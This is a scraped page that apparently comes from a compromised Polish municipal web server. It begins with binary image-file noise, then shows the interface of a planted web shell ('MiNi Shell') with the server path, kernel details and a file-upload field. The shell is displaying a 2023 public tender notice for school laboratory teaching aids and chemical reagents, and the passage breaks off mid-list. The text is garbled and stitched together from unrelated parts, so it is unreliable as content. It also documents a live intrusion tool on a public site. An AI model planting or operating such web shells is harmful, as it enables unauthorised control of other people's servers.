JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230202/0007876301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa pomocy dydaktycznych do pracowni przedmiotowych<br/>w ramach realizacji projektu „Stawiamy na przyszłość”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Świecki</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Powiatowy Zespół Ekonomiczno-Administracyjny</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092350978</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">gen. Józefa Hallera 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świecie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL618 - Świecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">525683247</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">jakubik.a@oswiata.csw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://pzeas-swiecie.rbip.mojregion.info/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa pomocy dydaktycznych do pracowni przedmiotowych<br/>w ramach realizacji projektu „Stawiamy na przyszłość”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5f887ec0-a2e3-11ed-9236-36fed59ea7dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00078763</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00077399/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa pomocy dydaktycznych do pracowni przedmiotowych w ramach realizacji projektu „Stawiamy na przyszłość”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt „Stawiamy na przyszłość” współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Osi priorytetowej 10. Innowacyjna edukacja, Działania 10.2 Kształcenie ogólne i zawodowe, Poddziałania 10.2.2 Kształcenie ogólne Regionalnego Programu Operacyjnego dla Województwa Kujawsko – Pomorskiego na lata 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacje zawarto w Rozdziale XI Specyfikacji Warunków Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzulę informacyjną zawarto w Rozdziale II Specyfikacji Warunków Zamówienia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZEA.251.2.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa pomocy dydaktycznych do pracowni przedmiotowych <br/>w ramach realizacji projektu „Stawiamy na przyszłość” współfinansowanego ze środków Europejskiego Funduszu Społecznego Osi priorytetowej 10. Innowacyjna edukacja, Działania 10.2 Kształcenie ogólne i zawodowe, Poddziałania 10.2.2 Kształcenie ogólne w ramach Regionalnego Programu Operacyjnego dla Województwa Kujawsko – Pomorskiego na lata 2014-2020.<br/><br/>2.	Opis części zamówienia: Całość zamówienia podzielono na 4 części.<br/><br/>3.	Część 1: Dostawa pomocy dydaktycznych do pracowni przedmiotowych w I Liceum Ogólnokształcącym im. Floriana Ceynowy w Świeciu z siedzibą przy ul. Gimnazjalnej 3: <br/>1)	pracownia robotyki: zestaw robotów – 6 zestawów wraz z dodatkowym wyposażeniem, w skład jednego zestawu wchodzą: akumulatorki AA – po 6 szt., ładowarka do akumulatorków – 1 szt. oraz dodatkowe czujniki np. kolorów, odległości itp. <br/><br/><br/>2)	pracownia chemiczna: <br/>a)	zestaw wyposażenia do pracowni chemicznej – 1 zestaw, w skład zestawu wchodzą: okulary ochronne – 8 szt., rękawiczki lateksowe – 8 op., bagietki – 20 szt., krystalizatory – 10 szt., łyżki do spalań – 10 szt., łyżki laboratoryjne – 10 szt., wodorotlenek sodu – 1 szt., fenoloftaleina – 1 szt., wskaźnik uniwersalny – 10 szt., dichromian potasu – 1 szt., manganian potasu – 1 szt., siarczan miedzi – 1 szt., oranż metylowy – 1 szt., glicerol – 1 szt., alkohol etylowy – 1 szt., płyn Lugola – 1 szt. chromian sodu – 1 szt., benzen – 1 szt.;<br/>b)	siarczan (VI) miedzi (II) – 1 szt. <br/><br/>3)	pracownia fizyczna: Zasilacz laboratoryjny 0-30V/5A DC prądu stałego – 1 szt., obwody elektryczne – 1 zestaw szkolny, czerwone pióropusze do prezentacji linii pola centralnego oraz oddziaływania ładunków (Z271) – 1 szt., wielka mapa księżyca – 1 szt., zestaw do doświadczeń z elektrostatyki – 3 zestawy, zestaw do doświadczeń z elektrostatyki – 3 szt., zestaw siłomierzy – 3 zestawy., maszyna elektrostatyczna – 1 szt., kuweta drgań prosta – 1 szt., maszyna do mieszania barw demonstrator kolorów rgb – 1 szt., układ okresowy pierwiastków chemicznych – 1 szt., jednostki układu SI plansza dydaktyczna – 1 szt., przyrząd do prezentacji Prawa Hooka – 1 szt., równia pochyła do doświadczeń z tarciem – 1 szt., stolik do badania momentów sił <br/>z odważnikami – 1 szt., zestaw przewodów z uchwytem – 1 zestaw., waga elektryczno-dydaktyczna do 5 kg – 1 szt., zestaw obwodów elektrycznych – 1 szt., elektrometr z puszką elektroskopową – 1 szt. <br/><br/>4)	pracownia biologiczna: Mikroskop optyczny – 8 szt., Zestaw wyposażenia do pracowni biologicznej – 1 zestaw. W skład zestawu wchodzą: szalki Petriego – 16 szt., bagietka – 16 szt., szczotka do probówek – 8 szt., probówki okrągłodenne szklane – 16 zestawów, zlewka 25 ml <br/>– 16 szt., zlewka 50 ml – 16 szt., zlewka 100 ml – 16 szt., 400 ml – 16 szt., pipety Pasteura – 16 zestawów, preparaty mikroskopowe – 2 szt. <br/><br/>5)	pracownia geograficzna: Zestaw wyposażenia do pracowni geograficznej – 1 zestaw, <br/>w skład zestawu wchodzi: deszczomierz – 8 szt., barometr – 8 szt., higrometr – 8 szt., wiatromierz – 8 szt., aparat fotograficzny – 1 szt., lornetka – 8 szt. <br/><br/>6)	pracownia ogólna: Słownik do j. angielskiego wersja papierowa – 6 szt., gra dydaktyczna Angielski Quiz konwersacyjny – 8 szt., gra dydaktyczna Quiz do nauki angielskich idiomów – 8 szt., Pomoce do matury. Znajomość środków językowych. Poziom podstawowy – 8 szt., Pomoce do matury. Znajomość środków językowych. Poziom rozszerzony – 8 szt., Pomoce do matury. Zestawy egzaminacyjne do matury ustnej – 16 szt., Zadania i zestawy maturalne z matematyki – 24 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamowienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa pomocy dydaktycznych do pracowni przedmiotowych <br/>w ramach realizacji projektu „Stawiamy na przyszłość” współfinansowanego ze środków Europejskiego Funduszu Społecznego Osi priorytetowej 10. Innowacyjna edukacja, Działania 10.2 Kształcenie ogólne i zawodowe, Poddziałania 10.2.2 Kształcenie ogólne w ramach Regionalnego Programu Operacyjnego dla Województwa Kujawsko – Pomorskiego na lata 2014-2020.<br/><br/>2.	Opis części zamówienia: Całość zamówienia podzielono na 4 części.<br/><br/>3.	Część 2: Dostawa pomocy dydaktycznych do pracowni przedmiotowych w II Liceum Ogólnokształcącym w Świeciu z siedzibą przy ul. Wojska Polskiego 85:<br/>1)	pracownia chemiczna: Zestaw wyposażenia do pracowni chemicznej – 1 zestaw, w skład zestawu wchodzą: fartuchy laboratoryjne – 3 szt., okulary ochronne – 3 szt., rękawiczki lateksowe – 3 opakowania, modele do budowania cząsteczek – 5 zestawów, waga laboratoryjna – 3 szt. <br/><br/>2)	pracownia geograficzna: Zestaw wyposażenia do pracowni geograficznej – 1 zestaw, w skład zestawu wchodzi: kompas – 3 szt., globus fizyczny – średnica 22 cm – 3 szt., globus fizyczny – średnica 32 cm – 3 szt., mapa świata polityczna – 1 szt., mapa ścienna świata klimatyczna – 1 szt., mapa ścienna świata geologia i tektonika – 1 szt., miernik do badania odczynu PH gleby – 3 szt., multimedialny geograficzny atlas świata – 1 szt., tellurium – 1 szt., model układu słonecznego – 1 szt., zestaw skamieniałości – 1 zestaw, zestaw skał i minerałów – 1 zestaw, profile glebowe – min. 15 próbek różnych gleb.<br/><br/>3)	pracownia biologiczna: Mikroskop optyczny – 3 szt., model szkieletu człowieka – 1 szt., model budowy anatomicznej człowieka – 1 szt. Zestaw wyposażenia do pracowni biologicznej – 1 zestaw, w skład zestawu wchodzi: blender ręczny – 2 szt., tacki, deski do krojenia – 3 szt., rękawiczki lateksowe – 3 opakowania, mikroskop terenowy – 1 szt., waga laboratoryjna 0,01g – 1 szt., Zestaw pęset o różnej długości – 1 zestaw, probówki ze statywem – 3 szt., pipety Pasteura – 1 opakowanie, pipety miarowe – 1 opakowanie, drewniane uchwyty do probówek – 3 szt., jodyna – 1 szt., skrobia – 1kg, glukoza – 1 kg, Sudan III – 1 szt., siarczan miedzi <br/>– 1 szt., wodorowęglan sodu – 1 szt., Proste klucze do oznaczania roślin (książka) – 3 szt., preparaty mikroskopowe – 1 zestaw różnych preparatów, odczynniki Fehlinga – 1 litr , model serca – 1 szt., model skóry człowieka – 1 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamowienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa pomocy dydaktycznych do pracowni przedmiotowych <br/>w ramach realizacji projektu „Stawiamy na przyszłość” współfinansowanego ze środków Europejskiego Funduszu Społecznego Osi priorytetowej 10. Innowacyjna edukacja, Działania 10.2 Kształcenie ogólne i zawodowe, Poddziałania 10.2.2 Kształcenie ogólne w ramach Regionalnego Programu Operacyjnego dla Województwa Kujawsko – Pomorskiego na lata 2014-2020.<br/><br/>2.	Opis części zamówienia: Całość zamówienia podzielono na 4 części.<br/><br/>3.	Część 3: Dostawa pomocy dydaktycznych do pracowni przedmiotowych w Liceum Ogólnokształcącym im. Mikołaja Kopernika w Nowem z siedzibą przy ul. Nowej 2:<br/><br/>1)	pracownia chemiczna: Zestaw wyposażenia do pracowni chemicznej – 1 szt., w skład zestawu wchodzą: butla do wody destylowanej – 1 szt., fartuchy laboratoryjne – 10 szt. okulary ochronne – 10 szt., rękawiczki lateksowe – 6 opakowań, tace laboratoryjne – 4 szt., bibuła laboratoryjna – 1 zestaw, łapy do próbówek drewniane – 10 szt. łyżki laboratoryjne – 4 szt., moździerz – 4 szt., stojaki do probówek – 4 szt., szczypce metalowe – 4 szt., szkiełka zegarkowe – 8 szt., termometr – 4 szt., tryskawki – 4 szt.; apteczka z wyposażeniem – 1 szt., pehametr – 1 szt., waga laboratoryjna do 1kg – 1 szt., waga laboratoryjna do 200g – 1 szt., zestaw odczynników chemicznych – 2 zestawy, aceton – 1 szt., alkohol etylowy (etanol-spirytus rektyfikowany ok. 95%) – 1 szt., alkohol etylowy skażony (denaturat) – 1 szt., Alkohol propylowy (propanol-2, izo-propanol) – 1 szt., alkohol trójwodorotlenowy (gliceryna, glicerol, propanotriol) – 1 szt. amoniak (roztwór wodny ok. 25%- woda amoniakalna) – 1 szt., azotan(V)amonu (saletra amonowa) – 1 szt., azotan(V)chromu(III) – 1 szt., azotan(V)potasu (saletra indyjska) – 1 szt., azotan(V) sodu (saletra chilijska) – 1 szt., azotan(V) srebra – 1 szt., benzyna ekstrakcyjna (eter naftowy- t.w. 60-90oC) – 1 szt., bibuła filtracyjna jakościowa średniosącząca – 100 szt., błękit tymolowy (wskaźnik – roztwór alkoholowy) – 1 szt., błękit tymolowy (wskaźnik – roztwór alkoholowy) – 1 szt., bromek potasu – 1 szt., chlorek sodu – 1 szt., chlorek amonu – 1 szt., chlorek cyny (II) – 1 szt. chlorek potasu – 1 szt., chlorek wapnia – 1 szt., chlorek żelaza(III) (roztwór ok.45%) – 1 szt., chlorobenzen – 1 szt., chloroform – 1 szt., cyna metaliczna (granulki) – 1 szt., cynk metaliczny (drut) – 1 szt., cynk metaliczny – 1 szt., cynk metaliczny (pył) – 1 szt., czterochloroetylen – 1 szt., dwuchromian(VI) sodu – 1 szt., fenol – 1 szt., fenoloftaleina (1% roztwór alkoholowy) – 1 szt., formalina – 1 szt., fosfor czerwony – 1 szt., fosforan sodu – 1 szt., glikol etylenowy – 1 szt., glin (metaliczny drut) – 1 szt., glin (pył) – 1 szt., glukoza – 1 szt., jodyna (alkoholowy roztwór jodu) – 1 szt., kamfora – 1 szt., krzemian sodu (szkło wodne) – 1szt., kwas aminooctowy (glicyna) – 1 szt., kwas azotowy(V) (ok.54 %) – 1 szt., kwas benzoesowy – 1 szt., kwas borowy – 1 szt., kwas chlorowodorowy (ok.36%, kwas solny) – 2 szt., kwas cytrynowy – 1 szt., kwas fosforowy(V) (ok.85 %) – 1 szt., kwas mrówkowy (kwas metanowy ok. 80%) – 1 szt., kwas octowy (kwas etanowy roztwór 80%) –1 szt., kwas oleinowy (oleina) – 1 szt., kwas salicylowy – 1 szt., kwas siarkowy(VI) (ok.96 %) – 2 szt., kwas stearynowy (stearyna) – 1 szt., magnez (metal - wiórki) – 1 szt., magnez (metal - wstążki) – 1 szt., manganian(VII) potasu (nadmanganian potasu) – 2 szt., miedź (metal- drut Ø 2 mm) – 1 szt., miedź (metal-blaszka grubość 0,1 mm) – 1 szt., mocznik – 1 szt., nadtlenek wodoru ok.30% (woda utleniona, perhydrol) – 1 szt., naftalen – 1 szt., octan etylu – 1 szt., octan ołowiu(II) – 1 szt., octan sodu bezwodny – 1 szt., olej parafinowy –	1 szt., ołów (metal- blaszka grubość 0,5 mm) – 1 szt., oranż metylowy (wskaźnik w roztworze) – 1 szt., parafina rafinowana (granulki) – 1 szt., paski lakmusowe obojętne – 2 op.., paski wskaźnikowe uniwersalne – 2 op., rodanek amonu – 1 szt., ropa naftowa (minerał) – 1 szt., sacharoza (cukier krystaliczny) – 1 szt., sączki jakościowe (średnica 10 cm) – 2 op., siarczan (IV)sodu – 1 szt., siarczan (VI)cynku – 1 szt., siarczan (VI) glinu 18 hydrat – 1 szt., siarczan (VI) magnezu (sól gorzka) – 1 szt., Siarczan (VI) manganu (II) monohydrat – 1 szt., Siarczan (VI) miedzi (II) 5 hydrat – 1 szt., siarczan (VI) sodu – 1 szt., siarczan (VI) wapnia 1/2hydrat (gips palony) – 1 szt., siarczan (VI) wapnia 2 hydrat (gips krystaliczny-minerał) –	1 szt., siarka –	1 szt., skrobia ziemniaczana – 1 szt., sód (metaliczny, zanurzony w oleju parafinowym) – 1 szt., tiosiarczan sodu – 1 szt., tlenek glinu – 1 szt., tlenek magnezu –1 szt., tlenek manganu (IV) –1 szt., tlenek miedzi(II) –1 szt., tlenek ołowiu(II) (glejta) – 1 szt., tlenek żelaza(III) –1 szt., toluen – 1 szt., węgiel drzewny (drewno destylowane) – 1 szt., węglan potasu bezwodny – 1 szt., węglan sodu bezwodny (soda kalcynowana) – 1 szt., węglan sodu kwaśny (wodorowęglan sodu)	– 1 szt., węglan wapnia (grys marmurowy-minerał) – 1 szt., węglan wapnia (kreda strącona-syntetyczna) –1 szt., węglik wapnia (karbid )	– 1 szt., wodorotlenek litu –1 szt., wodorotlenek potasu 